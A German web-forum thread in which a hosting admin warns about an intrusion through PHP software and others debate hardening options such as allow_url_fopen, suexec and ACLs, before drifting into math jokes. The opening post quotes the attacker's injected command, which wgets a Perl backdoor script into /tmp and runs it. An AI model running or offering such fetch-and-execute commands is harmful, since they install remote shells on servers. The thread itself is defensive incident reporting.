Christian Kruse: Haltet eure PHP-Software aktuell!

9 90

Haltet eure PHP-Software aktuell!

Christian Kruse
  • webserver
  1. 0
    Senti
    1. 0
      TomIRL
      1. 0
        Christian Kruse
        1. 0

          Sarkasmus

          Zeromancer
          • meinung
          1. 0
            TomIRL
            1. 0
              at
        2. 1
          TomIRL
          1. 3
            Christian Kruse
            1. 0
              TomIRL
              1. 0
                Christian Kruse
                1. 0
                  Senti
            2. 0
              Andreas Korthaus
              1. 3
                Christian Kruse
                1. 2
                  Andreas Korthaus
                  1. 0
                    Benjamin Wilfing
                  2. 0
                    Christian Kruse
                    1. 0
                      Andreas Korthaus
                      1. 0
                        Christian Kruse
                        1. 0

                          Vektorwitze?

                          Der Martin
                          • menschelei
                          1. 0
                            Christian Kruse
                            1. 0
                              Der Martin
                              1. 0
                                Christian Kruse
                                1. 0
                                  MudGuard
                                  1. 0
                                    Christian Kruse
                                2. 0
                                  Der Martin
                      2. 0
                        Christian Kruse
                        1. 0
                          Andreas Korthaus
                2. -1
                  wahsaga
                  1. 0
                    Christian Kruse
                    1. 0
                      wahsaga
                      1. 1
                        Christian Kruse
              2. 0
                Andreas Korthaus
          2. -3
            Bio
  2. 0
    Andreas Korthaus
    1. 0
      Christian Kruse
      1. 0
        Klaus
        1. 0
          Christian Kruse
        2. 0
          TomIRL
          1. 0
            Fabienne
            1. 0
              Christian Kruse
      2. 0
        Andreas Korthaus
        1. 0
          Christian Kruse
        2. 0
          Christian Kruse
          1. 0
            Andreas Korthaus
            1. 0
              Christian Kruse
      3. -5
        Ludger
        1. 0
          Daniela Koller
          1. 0
            Ludger
            1. 0
              Daniela Koller
              1. -2
                Ludger
                1. 0
                  Mathias Bigge
            2. 0
              molily
              1. 0
                Ludger
              2. 0
                at
            3. 0
              Orlando
              1. 0
                Ludger
                1. 0

                  Ehrenamtliche Arbeit - Open Source und Selbstorganisation

                  Orlando
                  • menschelei
                2. 0
                  Mathias Bigge
                  1. 0
                    Ludger
                    1. 0
                      Swen Wacker
                      1. 0
                        Ludger
                        1. 0
                          Swen Wacker
                          1. 0
                            Ludger
                            1. 0
                              Orlando
                              1. 0
                                Ludger
                              2. 0
                                Swen Wacker
                                1. 0
                                  Orlando
                          2. 0
                            at
                            1. 0
                              Swen Wacker
                              1. 0
                                MudGuard
                              2. 0
                                at
                                1. 0
                                  Swen Wacker
                                  1. 0
                                    at
                                    1. 0
                                      Swen Wacker
        2. 3
          Swen Wacker
        3. 1
          Thomas J.S.
          1. 0
            Ludger
          2. 0
            Andreas Lindig
            1. 0
              Ludger
              1. 3
                Siramon
                1. -3
                  Ludger
                  1. 1
                    Anonymous
                  2. 0
                    Siramon
                    1. 0
                      Ludger
                      1. 0
                        Siramon
                        1. 0
                          Ludger
                          1. 0
                            Siramon
  3. 1
    dedlfix
  4. 0
    Manuel B.

你们好,

nur eine Warnung: haltet eure PHP-Software aktuell! Potentielle Löcher
bilden phpBB, phpNuke und ähnliche Ranz-Software! Wenn ihr selber Programme
schreibt, die exec(), system(), include() oder ähnliches benutzen: validiert
die Eingabe vernünftig!

Hintergrund der Sache: es hat jemand geschafft, auf bastet.occuris.de Code
über eine solche Software einzuschleusen:

system("uname -a");
system("cd /tmp;wget http://http://geocities.yahoo.com.br/netbrdial/bd.pl;cd /tmp;perl bd.pl");

Fragt mich nicht, über welche Sicherheitslücke er das geschafft hat, das
habe ich noch nicht entdeckt. Wichtig ist nur der Code von bd.pl -- das ist
ein (recht gut gemachter) telnet-artiger Daemon, mit dem der Angreifer
Shell-Zugriff bekommt. Glücklicherweise ist das System halbwegs
abgesichert, deshalb hat der Angreifer keine weiterführenden Rechte
bekommen. Am besten ist es, derartige Software gar nicht erst einzusetzen!
Und wenn ihr sie einsetzt, deaktiviert per php.ini (disable_functions)
mindestens die Funktionen system, exec, shell_exec, proc_open!

再见,
克里斯蒂安

--
Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"
http://wwwtech.de/
  1. Hi,
    ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.

    MfG

    --
    ie:{ fl:( br:^ va:) ls:[ fo:| rl:? n4:( ss:) de:] js:( ch:? sh:) mo:| zu:)
    1. Moin,

      Hi,
      ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.

      Toller Tip!
      Ich empfehle den Rechner gar nicht erst anzuschalten.
      Das ist die sicherste Methode unerwünschten Code zu verbieten, besser jedenfalls als irgendwelche nützlichen Funktionen zu disablen.

      TomIRL

      1. 你好 TomIRL,

        ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.

        Toller Tip!

        Richtig, der Tipp ist gar nicht mal so schlecht. allow_url_fopen() ist einer
        der Haupt-Verursacher für solche Sicherheitsprobleme.

        Ich empfehle den Rechner gar nicht erst anzuschalten.
        Das ist die sicherste Methode unerwünschten Code zu verbieten, besser
        jedenfalls als irgendwelche nützlichen Funktionen zu disablen.

        Dein Sarkasmus ist fehl am Platze.

        再见,
        克里斯蒂安

        --
        Unsere Vorstellungen von der Ewigkeit sind genauso nuetlich wie die Mutmassungen eines Kuehkens ueber die Aussenwelt bevor es die Eierschale aufbricht.
        http://wwwtech.de/
        1. Hallo CK,

          Dein Sarkasmus ist fehl am Platze.

          ich habe manchmal den Eindruck, dass TomIRL der <ironie>einzige Forumsteilnehmer mit entsprechendem Wissen</ironie> ist (vgl. ein Auszug). Zumindest an seinen Formulierungen sollte er "feilen".

          Mit freundlichen Grüßen

          André

          1. Moin,

            Hallo CK,

            Dein Sarkasmus ist fehl am Platze.

            ich habe manchmal den Eindruck, dass TomIRL der <ironie>einzige Forumsteilnehmer mit entsprechendem Wissen</ironie> ist (vgl. ein Auszug). Zumindest an seinen Formulierungen sollte er "feilen".

            Oh danke..
            Meine Mailadresse kennst Du?
            Wenn Du mit mir ein Problem haben solltest darfst Du mir das gern per mail schreiben.

            TomIRL

            1. Hallo.

              Wenn Du mit mir ein Problem haben solltest darfst Du mir das gern per mail schreiben.

              Wenn die Reaktion die gleiche ist wie die auf per Kontaktformular an dich gerichtete Anmerkungen, kann man sich das aber auch sparen.
              MfG, at

        2. Moin,

          你好 TomIRL,

          ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.

          Toller Tip!

          Richtig, der Tipp ist gar nicht mal so schlecht. allow_url_fopen() ist einer
          der Haupt-Verursacher für solche Sicherheitsprobleme.

          Hauptverursacher ist IMHO der User mit dem Buggy Script.
          Wie willst du ohne allow_url_fopen sonst beispielsweise Datenbestände von verschiedenen Servern aktualisieren?
          Problematisch ist es allemal irgendwas auf Servern ausführbar zu machen, das ist aber kein PHP Problem und erst recht kein Problem von allow_url_fopen.

          TomIRL

          1. 你好 TomIRL,

            ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.

            Toller Tip!

            Richtig, der Tipp ist gar nicht mal so schlecht. allow_url_fopen() ist
            einer der Haupt-Verursacher für solche Sicherheitsprobleme.

            Hauptverursacher ist IMHO der User mit dem Buggy Script.

            Hauptverursacher ist eine konzeptionelle Schwäche in PHP.

            Wie willst du ohne allow_url_fopen sonst beispielsweise Datenbestände von
            verschiedenen Servern aktualisieren?

            Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen
            nutzen, um das zu tun? Gäbe es Extra-Funktionen für den Zugriff auf
            externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme
            gleich erschlagen.

            Problematisch ist es allemal irgendwas auf Servern ausführbar zu machen,
            das ist aber kein PHP Problem und erst recht kein Problem von
            allow_url_fopen.

            Es ist eindeutig eine konzeptionelle Schwäche von PHP.

            再见,
            克里斯蒂安

            --
            Echte Hacker benutzen Aexte. (Thomas Walter in de.org.ccc)
            http://wwwtech.de/
            1. Moin,

              Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen
              nutzen, um das zu tun? Gäbe es Extra-Funktionen für den Zugriff auf
              externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme
              gleich erschlagen.

              Hm darüber hab ich mir ehrlich gesagt noch keine Gedanken gemacht.
              Du meinst also wenn man eine Funktion, die ausschliesslich "Text" einliest und alle anderen Sachen draußen läßt?

              1. 你好 TomIRL,

                Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen
                nutzen, um das zu tun? Gäbe es Extra-Funktionen für den Zugriff auf
                externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme
                gleich erschlagen.

                Hm darüber hab ich mir ehrlich gesagt noch keine Gedanken gemacht.
                Du meinst also wenn man eine Funktion, die ausschliesslich "Text" einliest
                und alle anderen Sachen draußen läßt?

                Richtig, vor allem sollte sie nicht ungefragt externe Ressourcen anfordern.
                Ich finde es ziemlich hirnverbrannt, wenn ich mit fopen() (_File_ open) einen
                HTTP-Request machen kann. Das lädt doch geradezu dazu ein, Unfug zu machen.
                Dazu sollte es Extra-Funktionen geben...

                再见,
                克里斯蒂安

                --
                Ich bewundere wirklich den Sinn der Bienen für kollektive Verantwortung. Obwohl sich einzelne Bienen hin und wieder bekämpfen, herrscht zwischen Ihnen grundsätzlich ein starkes Gefühl für Eintracht und Zusammenarbeit. Wir Menschen gelten als sehr viel weiter entwickelt, doch mitunter rangieren wir sogar hinter kleinen Insekten.
                http://wwwtech.de/
                1. Tach auch,

                  Richtig, vor allem sollte sie nicht ungefragt externe Ressourcen anfordern.
                  Ich finde es ziemlich hirnverbrannt, wenn ich mit fopen() (_File_ open) einen
                  HTTP-Request machen kann. Das lädt doch geradezu dazu ein, Unfug zu machen.
                  Dazu sollte es Extra-Funktionen geben...

                  Für externe Zugriffe nutze ich z.B. die CURL funktionen.

                  MfG

                  --
                  ie:{ fl:( br:^ va:) ls:[ fo:| rl:? n4:( ss:) de:] js:( ch:? sh:) mo:| zu:)
            2. Hallo Christian!

              Hauptverursacher ist IMHO der User mit dem Buggy Script.

              Hauptverursacher ist eine konzeptionelle Schwäche in PHP.

              Die da wäre? Was ich im Moment mitbekomme, erfolgt ein wirklich großer Teil aktueller Angriffe über awstat - awstat.pl!

              Das Problem ist IMHO, dass man weniger können muss um PHP zu schreiben, und entsprechend viele schlechte PHP-Programmierer und damit unsichere PHP-Scripte gibt es.

              Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen
              nutzen, um das zu tun?

              Warum nicht? Man kann auch mysql_query() so nutzen, dass eine Sicherheitslücke entsteht - was soll man dagegen machen?

              Gäbe es Extra-Funktionen für den Zugriff auf
              externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme
              gleich erschlagen.

              Ich hoffe sehr, dass es PECL::HTTP noch in PHP 5.1 schafft (beta soll AFAIK heute kommen), das wäre mal sehr viel eleganter als diese nervige Geschichte mit fsockopen(): http://dev.iworks.at/ext-http/http-functions.html.gz

              Allerdings verwende ich für sowas schon seit längerem PEAR::HTTP_Request (ist ja quasi auch ein Bestandateil von PHP - ähnlich wie ein CPAN-Modul).

              allow_url_fopen habe ich abgeschaltet. Ich finde allow_url_fopen selber schlecht, weil sobald sich irgendwo eine entsprechende, kleine Lücke einschleicht - ob es ein eigenes Script ist oder ein fremdes, oder eine fertige Software - ist ein Angreifer sofort in der Lage eigenen PHP-Code auszuführen. Gut, sagen wir Du nutzt disable_function - es gibt aber noch andere Mittel und Wege fremde Extensions (AFAIR z.B. curl, mssql, oracle...) dazu zu bewegen, Programme auszuführen.

              IMHO sollten User nur Prozesse unter eigener UID laufen lassen können (suexec/suphp für CGI), entsprechend sollen User nur die Programme auf der Kommandozeile ausführen können, die sie evtl. benötigen, alles andere nach Möglichkeit entfernen, oder wenigstens chmod (0700).

              Allerdings betreue ich keine Server mit fremden Usern und habe da möglicherweise gut Reden ;-)

              Grüße
              Andreas

              --
              SELFHTML Feature Artikel: http://aktuell.de.selfhtml.org/artikel/
              1. 你好 Andreas,

                Hauptverursacher ist IMHO der User mit dem Buggy Script.

                Hauptverursacher ist eine konzeptionelle Schwäche in PHP.

                Die da wäre?

                Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.

                Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen
                nutzen, um das zu tun?

                Warum nicht?

                Weil sie für _Datei_-Operationen gedacht sind. Nicht für
                Netzwerk-Operationen. Wenn man sowas transparent verwischt muss was übles
                bei rauskommen. Einmal nicht aufgepasst und schon machts krach-bumm.

                Man kann auch mysql_query() so nutzen, dass eine Sicherheitslücke
                entsteht - was soll man dagegen machen?

                Da kann man nichts gegen machen, das kann immer mal passieren. Aber man
                kann unnötige Risikofaktoren ausschliessen.

                allow_url_fopen habe ich abgeschaltet.

                Leider scheinen das einige unserer Kunden zu brauchen. Wobei ich sagen
                muss, dass ich überlege, das trotzdem abzuschalten.

                Ich finde allow_url_fopen selber schlecht, weil sobald sich irgendwo
                eine entsprechende, kleine Lücke einschleicht - ob es ein eigenes Script
                ist oder ein fremdes, oder eine fertige Software - ist ein Angreifer
                sofort in der Lage eigenen PHP-Code auszuführen.

                Ja, eben!

                IMHO sollten User nur Prozesse unter eigener UID laufen lassen können
                (suexec/suphp für CGI),

                Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur
                (normalerweise installierten) Modul-Version aufweist.

                entsprechend sollen User nur die Programme auf der Kommandozeile
                ausführen können, die sie evtl. benötigen, alles andere nach Möglichkeit
                entfernen, oder wenigstens chmod (0700).

                Das hätte in diesem Fall auch nichts geholfen. Perl zu verbieten ist...
                naja, leicht lächerlich ;-) Da hilft nur eine vernünftige Administration,
                der Angreifer konnte ja nichts ausrichten, er hatte “nur” Apache-Rechte.
                Und der darf nicht sonderlich viel... wenn man mit ACLs arbeitet, kann
                man da sehr viel recht schön einschränken.

                Allerdings betreue ich keine Server mit fremden Usern und habe da
                möglicherweise gut Reden ;-)

                Ja ;-)

                再见,
                克里斯蒂安

                --
                Die Stärke des Geistes ist unendlich, die Muskelkraft dagegen ist begrenzt.
                http://wwwtech.de/
                1. Hallo Christian!

                  ?? Andreas,

                  so langsam würde ich ja schon gerne mal sehen was da an Stelle der Fragezeichen stehen müsste ;-)

                  Hauptverursacher ist eine konzeptionelle Schwäche in PHP.

                  Die da wäre?

                  Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.

                  So schlecht finde ich die Idee nicht. Es bietet die Möglichkeit sehr einfach Dateien von einem auf den anderen Server zu übertragen. Sicher sind auf der Transport-Schicht dazwischen keine "Dateien" bekannt, aber an den beiden Endpunkten der Kommunikation normalerweise schon.

                  Das Problem ist dass man es IMHO zu unvorsichtig aktiviert hat, die DAUs waren begeistert, und heute benutzen das so viele Scripte, dass man es kaum noch abschalten kann - obwohl die Argumente dafür immer zwingender werden.

                  IMHO war es der größte Fehler, dass auf die zusätzliche Gefahr der diese Funktionen aufgrund von allow_url_fopen ausgesetzt sind, nicht wikrlich eindringlich hingewiesen wurde. Leider sagen viele PHP-Devs, "sollen die Admins/Programmier sich doch bitte drum kümmern, die müssen das selber einschätzen können, die müssen selber wissen was sie machen, wir können nicht verhindern dass sich die Leute reihenweise in die Füße schießen...".

                  Einmal nicht aufgepasst und schon machts krach-bumm.

                  Eigentlich ist das Problem dasselbe wie lokal (ohne allow_url_fopen), mit dem kleinen aber feinen Unterschied, dass die Auswirkungen erheblich verheerender sind.

                  IMHO sollten User nur Prozesse unter eigener UID laufen lassen können
                  (suexec/suphp für CGI),

                  Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur
                  (normalerweise installierten) Modul-Version aufweist.

                  Die Unterschiede sind doch wohl marginal. Eigentlich betrifft es ja nur HTTP-Header Geschichten. Der wichtigste (Location) funktioniert ganz normal, das einzige was halt wirklich fehlt ist HTTP-Auth. Aber das wird so häufig auch nicht verwendet. Abgesehen davon setzen alle großen Provider die ich kenne php-cgi ein (domainfactory, 1&1, Schlund, AFAIR auch hosteurope und strato), also scheint das auch irgendwie zu gehen. Ich habe normalen Webspace bisher noch nie mit mod_php gehabt, und das finde ich aus heutiger Sicht auch sehr sinnvoll.

                  Ich finde den Gedanken gut dass User nicht Daten anderer User manipulieren können, so bleiben solche Fehltritte wie in deinem Fall wenigstens auf den einen User beschränkt, das heißt, der Angreifer kann mit dem Account machen was er will, aber er kann nicht auf Daten anderer User zugreifen.

                  Besonders wild wirds doch bei mod_php wenn der Webserver in ein Verzeichnis schreiben soll (upload -> chmod(0777) usw.).

                  entsprechend sollen User nur die Programme auf der Kommandozeile
                  ausführen können, die sie evtl. benötigen, alles andere nach Möglichkeit
                  entfernen, oder wenigstens chmod (0700).

                  Das hätte in diesem Fall auch nichts geholfen.

                  Ich dachte er hätte den Kram mit wget runtergeladen?

                  Aber OK, er hätte den Kram vermutlich auch Zeile für Zeile mit echo in eine lokale Datei schreiben können...

                  Perl zu verbieten ist...
                  naja, leicht lächerlich ;-)

                  klar.

                  Da hilft nur eine vernünftige Administration,
                  der Angreifer konnte ja nichts ausrichten, er hatte “nur” Apache-Rechte.

                  Er hat es immerhin geschafft dass der Webserver offline war. Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden Zugriff, könnte alle DB-Zugangsdaten auslesen und wer weiß was noch alles. IMHO sollte eine gute Konfiguration sowas vermeiden! Das System muss komplett auf aktuellem Stand sein, denn es reicht ein kleine Lücke im Kernel oder einem Programm was unter root läuft, und schon hat er selber root und kann machen was er will.

                  Was ich bisher aber nicht wüßte wie ich es vermeide, ist es z.B. DB-Zugangsdaten in Scripten (anderer Kunden) vor so einem Angreifer zu schützen. Solange der Webserver diese Zugangsdaten lesen kann, kann der Angreifer das auch. Man kann zwar ein Directory-Listing verhindern, dass er nicht sofort sieht wo die anderen Kundendaten liegen, aber darauf würde ich mich jetzt eher nicht verlassen wollen. Man kann auch verhindern dass er in der Shell auf andere Kunden-Verzeichnisse zugreift - aber kann man auch verhindern dass er mit dem Apachen zugreift? Ich meine - angenommen ich kenne das Verzeichnis anderer Kunden, was hält mich davon ab per .htaccess und z.B. Alias mal ein bisschen in den Verzeichnissen zu stöbern, und mit Dateien dort als text/plain ausliefern zu lassen?

                  Und der darf nicht sonderlich viel... wenn man mit ACLs arbeitet, kann
                  man da sehr viel recht schön einschränken.

                  OK, ACLs, sicher nicht verkehrt. Ich verwende noch das grsec-patch (proaktive Sicherheit gegen gewissen Angriffe, PAX...), gibts bei Gentoo als grsec-sources. Hat den Vortei, dass einige Exploits (nicht alle) auf so einem System nicht funktionieren.

                  Allerdings betreue ich keine Server mit fremden Usern und habe da
                  möglicherweise gut Reden ;-)

                  Ja ;-)

                  Also ich hätte jetzt gedacht mod_php auf Hosting-Servern sei inzwischen mehr oder weniger ausgestorben ;-)

                  Grüße
                  Andreas

                  --
                  SELFHTML Tipps & Tricks: http://aktuell.de.selfhtml.org/tippstricks/
                  1. Hi Andreas,

                    ?? Andreas,

                    so langsam würde ich ja schon gerne mal sehen was da an Stelle der Fragezeichen stehen müsste ;-)

                    chinesische Zeichen. ;-) Bei mir sieht das so aus: .

                    Viele Grüße
                    Benjamin

                  2. 你好 Andreas,

                    ?? Andreas,

                    so langsam würde ich ja schon gerne mal sehen was da an Stelle der
                    Fragezeichen stehen müsste ;-)

                    Installiere dir entsprechende Schriften :)

                    Hauptverursacher ist eine konzeptionelle Schwäche in PHP.

                    Die da wäre?

                    Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.

                    So schlecht finde ich die Idee nicht. Es bietet die Möglichkeit sehr
                    einfach Dateien von einem auf den anderen Server zu übertragen.

                    Und es wäre schwerer, wenn man eine eigene Funktionsgruppe dazu einführt?
                    Ne, sorry, aber das will mir nicht einleuchten, das halte ich für groben
                    Unfug.

                    Einmal nicht aufgepasst und schon machts krach-bumm.

                    Eigentlich ist das Problem dasselbe wie lokal (ohne allow_url_fopen),
                    mit dem kleinen aber feinen Unterschied, dass die Auswirkungen erheblich
                    verheerender sind.

                    Richtig. Wie ich bereits sagte: Risiko-Faktoren minimieren.

                    IMHO sollten User nur Prozesse unter eigener UID laufen lassen können
                    (suexec/suphp für CGI),

                    Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur
                    (normalerweise installierten) Modul-Version aufweist.

                    Die Unterschiede sind doch wohl marginal.

                    Aber vorhanden.

                    Ich finde den Gedanken gut dass User nicht Daten anderer User
                    manipulieren können,

                    Das geht bei uns auch nicht :) open_basedir ist pro vhost gesetzt.

                    Da hilft nur eine vernünftige Administration,
                    der Angreifer konnte ja nichts ausrichten, er hatte “nur” Apache-Rechte.

                    Er hat es immerhin geschafft dass der Webserver offline war.

                    “Und das ist auch gut so”[tm] ;-)

                    Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden Zugriff,
                    könnte alle DB-Zugangsdaten auslesen und wer weiß was noch alles. IMHO
                    sollte eine gute Konfiguration sowas vermeiden!

                    Nein, das ist auf einem Multi-User-Server so ohne weiteres nicht vermeidbar.
                    Nicht wgen der Technik, sondern wegen der User. “Geht nicht? Access
                    denied? Arg! *chmod 777*”.

                    Was ich bisher aber nicht wüßte wie ich es vermeide, ist es z.B.
                    DB-Zugangsdaten in Scripten (anderer Kunden) vor so einem Angreifer zu
                    schützen. Solange der Webserver diese Zugangsdaten lesen kann, kann der
                    Angreifer das auch.

                    Naja, nicht wirklich. Wenn man mit suexec arbeitet, kann man das Problem
                    schon weitestgehend umgehen.

                    Man kann zwar ein Directory-Listing verhindern, dass er nicht sofort
                    sieht wo die anderen Kundendaten liegen, aber darauf würde ich mich
                    jetzt eher nicht verlassen wollen. Man kann auch verhindern dass er in
                    der Shell auf andere Kunden-Verzeichnisse zugreift - aber kann man auch
                    verhindern dass er mit dem Apachen zugreift?

                    Jop. Siehe suexec ;-)

                    Ich meine - angenommen ich kenne das Verzeichnis anderer Kunden, was hält
                    mich davon ab per .htaccess und z.B. Alias mal ein bisschen in den
                    Verzeichnissen zu stöbern, und mit Dateien dort als text/plain ausliefern
                    zu lassen?

                    Auf Passwort-Dateien braucht der Apache bei suexec keinen Zugriff. Warum
                    auch? Man greift ja mit Benutzer-Rechten zu.

                    Und der darf nicht sonderlich viel... wenn man mit ACLs arbeitet, kann
                    man da sehr viel recht schön einschränken.

                    OK, ACLs, sicher nicht verkehrt. Ich verwende noch das
                    grsec-patch (proaktive Sicherheit
                    gegen gewissen Angriffe, PAX...), gibts bei Gentoo als grsec-sources.
                    Hat den Vortei, dass einige Exploits (nicht alle) auf so einem System
                    nicht funktionieren.

                    Jo, grsec ist nicht verkehrt.

                    再见,
                    克里斯蒂安

                    --
                    Q: God, root, what's the difference?
                    A: God is merciful.
                    http://wwwtech.de/
                    1. Hallo!

                      Installiere dir entsprechende Schriften :)

                      Da hilft wohl nur ein "recherchiere diese bitte im </archiv/>" ;-)

                      Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.

                      So schlecht finde ich die Idee nicht. Es bietet die Möglichkeit sehr
                      einfach Dateien von einem auf den anderen Server zu übertragen.

                      Und es wäre schwerer, wenn man eine eigene Funktionsgruppe dazu einführt?
                      Ne, sorry, aber das will mir nicht einleuchten, das halte ich für groben
                      Unfug.

                      Naja, zumindest bei include() halte ich es auch für groben Unfung. Wozu sollte man PHP-Scripte über das Web einbinden wollen? Und wenn man das schon will dann soll man doch bitte sowas wie eval(file_get_contents()) verwenden, das sieht wenigstens auch der Ober-DAU dass man das nicht unbedingt immer so machen sollte. Leider funktioniert das AFAIK nicht 1:1...

                      Allerdings sieht es so aus, als würde die HTTP-Extension doch nicht aufgenommen ("keine neuen spezialisierten Extensions...").

                      Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur
                      (normalerweise installierten) Modul-Version aufweist.

                      Die Unterschiede sind doch wohl marginal.

                      Aber vorhanden.

                      Was die großen Hoster aber wohl nicht stört.

                      Ich finde den Gedanken gut dass User nicht Daten anderer User
                      manipulieren können,

                      Das geht bei uns auch nicht :) open_basedir ist pro vhost gesetzt.

                      Hilft aber nicht gegen eine Perl-Shell *g*

                      Und seit wann vertraust Du auf open_basedir? OK, Risikominimierung, naja.

                      Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden Zugriff,
                      könnte alle DB-Zugangsdaten auslesen und wer weiß was noch alles. IMHO
                      sollte eine gute Konfiguration sowas vermeiden!

                      Nein, das ist auf einem Multi-User-Server so ohne weiteres nicht vermeidbar.
                      Nicht wgen der Technik, sondern wegen der User. “Geht nicht? Access
                      denied? Arg! *chmod 777*”.

                      Ja, aber das Problem gibt es auch nur wegen mod_php, weil alle unter einem User laufen. Bei suexec kannst Du strengere Rechte setzen, evtl. auch eine hübsche umask ;-)

                      Bei suexec kannst Du folgende Rechte verwenden:

                      HTML, Bilder, CSS...: 640
                      Verzeichnisse: 710
                      Perl-Skripte: 700
                      PHP-Skripte/Includes: 600

                      Bei mod_php geht das schlicht und ergreifend nicht. Bei suexec habe ich es wenigstens selber in der Hand meine Passwort-Datei mit entsprechend restriktiven Rechten zu versehen!

                      Auf Passwort-Dateien braucht der Apache bei suexec keinen Zugriff. Warum
                      auch? Man greift ja mit Benutzer-Rechten zu.

                      Stimmt.

                      Viele Grüße
                      Andreas

                      PS: bei der Fehlermeldung "generalverweis gepostet" vergisst er irgendwie Themenbereich und Thema in der Vorschau einzufügen

                      --
                      SELFHTML Linkverzeichnis: http://aktuell.de.selfhtml.org/links/
                      1. 你好 Andreas,

                        Und seit wann vertraust Du auf open_basedir?

                        Vertrauen? Tue ich nicht :)

                        Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden
                        Zugriff, könnte alle DB-Zugangsdaten auslesen und wer weiß was noch
                        alles. IMHO sollte eine gute Konfiguration sowas vermeiden!

                        Nein, das ist auf einem Multi-User-Server so ohne weiteres nicht
                        vermeidbar. Nicht wgen der Technik, sondern wegen der User. “Geht
                        nicht? Access denied? Arg! *chmod 777*”.

                        Ja, aber das Problem gibt es auch nur wegen mod_php, weil alle unter
                        einem User laufen.

                        Nein, das Problem gibt es immer bei unbedarften Usern.

                        Bei mod_php geht das schlicht und ergreifend nicht.

                        Doch -- aber dann musst du ACLs setzen ;-)

                        再见,
                        克里斯蒂安

                        --
                        Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"
                        http://wwwtech.de/
                        1. Hallo Christian,

                          wo hast du eigentlich die diversen Vektor- und sonstigen Mathematik-Witze her? Gibt's da irgendwo eine Sammlung, oder muss man sich die selbst jahrelang sammeln?

                          Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"

                          Ich erinnere mich noch an einen ähnlichen, den ich hier vor einiger Zeit gelesen habe:

                          Kommt ein Vektor zur Suchtberatungsstelle: "Ich bin linear abhängig!"

                          Und bestimmt hast du noch eine Menge mehr davon auf der Pfanne?

                          Ciao & schönes Wochenende,

                          Martin

                          1. 你好 Martin,

                            wo hast du eigentlich die diversen Vektor- und sonstigen Mathematik-Witze
                            her?

                            Gesammelt ;-)

                            Gibt's da irgendwo eine Sammlung, [...]

                            Ich bin mir sicher, die gibt es. “Mathematiker-Witze” wäre ein
                            Google-Stichwort... ;-)

                            Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin
                            orientierungslos!"

                            Ich erinnere mich noch an einen ähnlichen, den ich hier vor einiger Zeit
                            gelesen habe:

                            Kommt ein Vektor zur Suchtberatungsstelle: "Ich bin linear abhängig!"

                            Ja, der ist auch in meiner Signatur-Datei *g*

                            Und bestimmt hast du noch eine Menge mehr davon auf der Pfanne?

                            Das hier sind alle, die ich gesammelt hab:

                            • Kommt ein Vektor zur Drogenberatung: "Hilfe, ich bin linear abhaengig!"
                            • Sei ε kleiner Null.
                            • Kommt ein Nullvektor zum Psychiater: "Herr Doktor, ich bin orientierungslos!"
                            • Treffen sich zwei Geraden. Sagt die eine: "Beim nächsten Mal gibst du einen aus."
                            • Die Summe zweier gerader Primzahlen ist immer eine Quadratzahl.
                            • 1 + 1 = 3 für gosse Werte von 1.
                            • 73.255437% der Statistiken spielen eine Genauigkeit vor, die durch die angewandte Methode nicht gerechtfertigt wird.
                            • 89,7% aller Statistiken sind frei erfunden!
                            • Mensch zu Mathematiker: "Ich finde Ihre Arbeit ziemlich monoton". Mathematiker: "Mag sein! Dafür ist sie aber stetig und unbeschränkt."
                            • lim(3->4)(sqrt(3)) = 2

                            ;-)

                            再见,
                            克里斯蒂安

                            --
                            Der Geist ist alles. Du wirst, was du denkst.
                            http://wwwtech.de/
                            1. Hallo,

                              Gesammelt ;-)

                              ja danke, das war mir eigentlich fast klar...

                              Ich bin mir sicher, die gibt es. “Mathematiker-Witze” wäre ein
                              Google-Stichwort... ;-)

                              Hab ich inzwischen auch probiert, und bin reichlich fündig geworden. Auch einige der von dir gelegentlich zitierten waren unter den Fundstellen.
                              Ich hatte mir nur gedacht, ich frag erstmal bei der vermeintlichen Quelle nach. :)

                              Allerdings sind hier und da immer wieder ein paar Witze dabei, die ich (möglicherweise mangels mathematischen Enthusiasmus) irgendwie nicht verstehe. Was ein Lemma ist, kriege ich bestimmt noch raus, aber hier:

                              • Sei ε kleiner Null.

                              steh ich irgendwie im Regen. Der taucht öfters auf. Epsilon kleiner Null - ja und? Wo ist da die Stelle zum Lachen? Fehlt mir da ein Stück Wissen oder denke ich mal wieder zu kompliziert?

                              So long,

                              Martin

                              1. 你好 Der,

                                • Sei ε kleiner Null.

                                steh ich irgendwie im Regen. Der taucht öfters auf. Epsilon kleiner Null -
                                ja und? Wo ist da die Stelle zum Lachen? Fehlt mir da ein Stück Wissen oder
                                denke ich mal wieder zu kompliziert?

                                Mit ε (Epsilon) wird die Genauigkeits-Differenz bezeichnet. Du weisst ja,
                                dass Fliesskommazahlen bei Computern gemäß ihrer Natur nur begrenzt genau
                                sind. Deshalb macht man seltenst Vergleiche über ==, sondern etwa so:

                                Zwei Zahlen sind gleich, wenn |(a-b)| < ε

